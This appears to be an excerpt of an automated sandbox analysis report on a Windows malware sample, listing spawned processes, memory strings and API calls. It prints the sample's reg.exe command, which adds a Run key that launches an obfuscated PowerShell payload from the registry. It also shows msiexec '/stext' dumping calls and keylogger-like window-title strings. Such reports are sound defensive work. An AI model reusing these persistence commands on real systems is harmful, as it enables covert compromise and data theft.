            Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Ventetiders38" /t REG_EXPAND_SZ /d "%Endopolyploid253% -windowstyle 1 $Micropantograph=(Get-Item 'HKCU:\Software\Oldsags\').GetValue('Rebaptizes');%Endopolyploid253% ($Micropantograph)"Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\snncbfhsilpxcsxwccghl"Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\snncbfhsilpxcsxwccghl"Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\dpsucystvthkeylilntioief"Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\fjxfcqcnjbzoofhmcxfkznqovmy"Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\fjxfcqcnjbzoofhmcxfkznqovmy"Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Ventetiders38" /t REG_EXPAND_SZ /d "%Endopolyploid253% -windowstyle 1 $Micropantograph=(Get-Item 'HKCU:\Software\Oldsags\').GetValue('Rebaptizes');%Endopolyploid253% ($Micropantograph)"Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\cmd.exe "c:\windows\system32\cmd.exe" /c reg add hkcu\software\microsoft\windows\currentversion\run /f /v "ventetiders38" /t reg_expand_sz /d "%endopolyploid253% -windowstyle 1 $micropantograph=(get-item 'hkcu:\software\oldsags\').getvalue('rebaptizes');%endopolyploid253% ($micropantograph)"
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add hkcu\software\microsoft\windows\currentversion\run /f /v "ventetiders38" /t reg_expand_sz /d "%endopolyploid253% -windowstyle 1 $micropantograph=(get-item 'hkcu:\software\oldsags\').getvalue('rebaptizes');%endopolyploid253% ($micropantograph)"
            Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\cmd.exe "c:\windows\system32\cmd.exe" /c reg add hkcu\software\microsoft\windows\currentversion\run /f /v "ventetiders38" /t reg_expand_sz /d "%endopolyploid253% -windowstyle 1 $micropantograph=(get-item 'hkcu:\software\oldsags\').getvalue('rebaptizes');%endopolyploid253% ($micropantograph)"Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add hkcu\software\microsoft\windows\currentversion\run /f /v "ventetiders38" /t reg_expand_sz /d "%endopolyploid253% -windowstyle 1 $micropantograph=(get-item 'hkcu:\software\oldsags\').getvalue('rebaptizes');%endopolyploid253% ($micropantograph)"Jump to behavior
            Source: msiexec.exe, 00000006.00000002.2896774357.0000000009110000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Managere.net
            Source: msiexec.exe, 00000006.00000002.2896774357.0000000009110000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager
            Source: msiexec.exe, 00000006.00000002.2896774357.00000000090E3000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2896774357.00000000090A6000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2896774357.0000000009110000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [2025/01/02 23:08:36 Program Manager]
            Source: msiexec.exe, 00000006.00000002.2896774357.0000000009110000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Managerles\*
            Source: msiexec.exe, 00000006.00000002.2896774357.00000000090A6000.00000004.00000020.00020000.00000000.sdmp, alepoty.dat.6.drBinary or memory string: [2025/01/02 23:08:30 Program Manager]
            Source: msiexec.exe, 00000006.00000002.2896774357.0000000009110000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Managernet/Z
            Source: msiexec.exe, 00000006.00000002.2896774357.0000000009110000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program ManagercghlH
            Source: msiexec.exe, 00000006.00000002.2896774357.0000000009110000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Managerw
            Source: msiexec.exe, 00000006.00000002.2896774357.0000000009110000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [%04i/%02i/%02i %02i:%02i:%02i Program Manager]
            Source: msiexec.exe, 00000006.00000002.2896774357.00000000090A6000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2896774357.0000000009110000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: |Program Manager|
            Source: msiexec.exe, 00000006.00000002.2896774357.0000000009110000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Managerles\*S
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_24ED2933 cpuid 6_2_24ED2933
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.SecureBoot.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.SecureBoot.Commands.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0012~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-UEV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\UEV\Microsoft.Uev.Commands.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\WindowsErrorReporting\Microsoft.WindowsErrorReporting.PowerShell.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure.CimCmdlets\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.CimCmdlets.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_24ED2264 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,6_2_24ED2264
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 12_2_004082CD memset,memset,memset,memset,GetComputerNameA,GetUserNameA,MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar,strlen,strlen,memcpy,12_2_004082CD
